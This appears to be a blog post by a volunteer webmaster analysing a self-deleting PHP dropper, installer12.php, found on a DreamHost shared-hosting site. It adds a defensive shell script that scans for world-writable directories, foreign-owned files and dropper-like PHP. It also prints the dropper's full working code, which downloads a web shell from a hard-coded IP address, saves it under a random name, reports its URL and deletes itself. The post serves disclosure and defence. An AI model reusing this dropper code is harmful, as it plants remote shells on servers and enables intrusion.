Hacking at DreamHost Using a Self-destructing Script

For our clients, we don't use those inexpensive shared hosting services, but the site for my daughter's school that I maintain pro bono is hosted on a shared server at DreamHost, which has been experiencing a series of hacking incidents. They host non-profit websites for free, so I'm not complaining, and am thankful for them. I just want to share the things I discovered on our site so that others may be able to benefit from it.

A few days ago, I noticed a file named installer12.php in one of our tmp directories. The file is designed to self-destruct: its last line of code is:

@unlink(__FILE__);

At the top of installer12.php is an array of hundreds of random words; the script shuffles the array and joins the first two words to create a file name. What that randomly named file does is explained by Leo Parker Dirac on his blog. In his case, installer12.php happened to pick "ainslie" and "turning" to create "ainslieturing.php". Both of these words are in installer12.php.

The reason installer12.php did not self-destruct on our site is that our tmp directory is not publicly accessible. The script only runs (and therefore only deletes itself) when it is requested through the web server, and we have an .htaccess file that sets the web root lower down in the directory structure. So the hacker somehow managed to copy installer12.php into our tmp directory but could not trigger it, because the file cannot be reached by URL. It therefore remains undeleted.

The installer12.php in our tmp directory has a Linux owner of rp_admin and a group of pg7029. Neither is ours, which means that the hacker did not copy installer12.php using any script on our site: a compromised or malicious script running under our website would have created the file with our Linux user and group (just like the JPEG files that we allow users to upload to the site). My guess, therefore, is that the hacker had shell access to the shared server where our site is hosted and was able to copy installer12.php into any directory on the server with permissions set to 777 (world-writable). In fact, our tmp directory had many subdirectories (about 100), and installer12.php was copied into all of them. So some sort of script searched the server for directories with mode 777 and automatically copied the file into every one of them.

After I reported this incident to DreamHost, they ran an automated script to scan our website for any suspicious files. It is supposed to delete any known malicious files, but it did not delete installer12.php, which leads me to believe that they are not aware of it.
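Since the host's scanner missed the file, it helps to be able to check a site tree yourself for the three things that made this incident possible and visible: world-writable directories that any other local user on a shared server can drop files into, files whose owner is not the site's own Linux user, and PHP files that combine the dropper's two traits (a curl fetch and a self-deleting unlink). The following POSIX shell script is an added example, not code from the original post or from DreamHost; the site path and user name in the usage comment are placeholders, and the .htaccess it writes assumes an Apache server that honours the classic Order/Deny directives (an assumption on my part, since the post does not say which Apache version DreamHost runs).

```shell
#!/bin/sh
# Added example: triage a site tree for the conditions described above.
# Assumes only POSIX sh, find, grep, sed and chmod.

# find_world_writable ROOT -> prints directories any local user can write to.
# A 777 directory on a shared host is exactly where installer12.php landed.
find_world_writable() {
    find "$1" -type d -perm -0002 2>/dev/null
}

# find_foreign_owned ROOT USER -> prints files not owned by USER.
# A file created by our own scripts would carry our user; rp_admin did not.
find_foreign_owned() {
    find "$1" -type f ! -user "$2" 2>/dev/null
}

# find_dropper_like ROOT -> prints .php files that both fetch with curl and
# delete themselves, the two traits of installer12.php. Fixed-string grep
# so the parentheses and underscores are matched literally.
find_dropper_like() {
    find "$1" -type f -name '*.php' 2>/dev/null | while IFS= read -r f; do
        if grep -qF 'unlink(__FILE__)' "$f" && grep -qF 'curl_init' "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# harden_dir DIR: take away world-write and refuse to serve PHP from it,
# so a dropped script cannot be triggered even if the directory is reachable
# by URL. (Apache 2.2-style directives; assumption, see lead-in.)
harden_dir() {
    chmod o-w "$1"
    cat > "$1/.htaccess" <<'EOF'
# Upload/temp directories hold data, not code: never execute PHP here.
<FilesMatch "\.(php|phtml|php[0-9]|phar)$">
    Order allow,deny
    Deny from all
</FilesMatch>
EOF
}

# triage ROOT USER: run all three checks, labelling each finding.
triage() {
    root=$1
    user=$2
    find_world_writable "$root" | sed 's/^/WORLD_WRITABLE_DIR /'
    find_foreign_owned "$root" "$user" | sed 's/^/FOREIGN_OWNER /'
    find_dropper_like "$root" | sed 's/^/DROPPER_LIKE /'
}

# Usage (path and user are placeholders, not from the post):
#   sh triage.sh /home/site_user/example.org/tmp site_user
if [ "$#" -eq 2 ]; then
    triage "$1" "$2"
fi
```

Run the triage first and read the findings before hardening anything: a foreign-owned file in a directory that is not world-writable points at a different entry path than the one described here, and is worth reporting to the host as such.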

Here's the code part of installer12.php (right above it is the big array of random words, $words). In short: get_page() fetches a text file from a hard-coded IP address with certificate verification disabled and a spoofed Firefox user agent; the script then picks a random two-word file name, writes the downloaded content into that file in its own directory (only if the download contains the string 8b7b, presumably a check that the real payload came back rather than an error page), prints the URL of the new file between ||| markers so that whoever requested the installer can parse it, and finally deletes itself:

// $words is the large array of random words defined above this point.

// Fetch a URL with curl; certificate checks are disabled and the
// user agent is spoofed as Firefox 3.5 on Windows.
function get_page($url){
    $ch1 = curl_init();
    curl_setopt($ch1, CURLOPT_URL, $url);
    curl_setopt($ch1, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch1, CURLOPT_TIMEOUT, 1000);
    curl_setopt($ch1, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.2; ru; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)");
    $results = curl_exec($ch1);
    curl_close($ch1);
    return $results;
}

// Download the shell payload from a hard-coded IP address.
$buf = get_page("http://176.65.163.29/newshell.txt");

// Pick two random words for the file name, e.g. "ainslieturing.php".
shuffle($words);
reset($words);
$name = $words[0].$words[1].".php";

// Write the payload next to this script, but only if the download
// contains the marker string "8b7b" and the file could be opened.
$f = @fopen($name,"w");
if ((strstr($buf,"8b7b")) && ($f)){
    @fwrite($f,$buf);
    @fclose($f);
    // Report the URL of the dropped file back to whoever requested this script.
    $host = $_SERVER["HTTP_HOST"];
    $uri = $_SERVER["REQUEST_URI"];
    $path = str_replace("//","/",pathinfo($uri,PATHINFO_DIRNAME)."/".$name);
    echo "|||OK|||http://$host".$path."|||";
} else {
    echo "|||BAD|||cant open file $name or cant get sh|||";
}
// Self-destruct: remove this installer once it has run.
@unlink(__FILE__);

I informed DreamHost about this. If they get back to me with any new info, I'll update this post.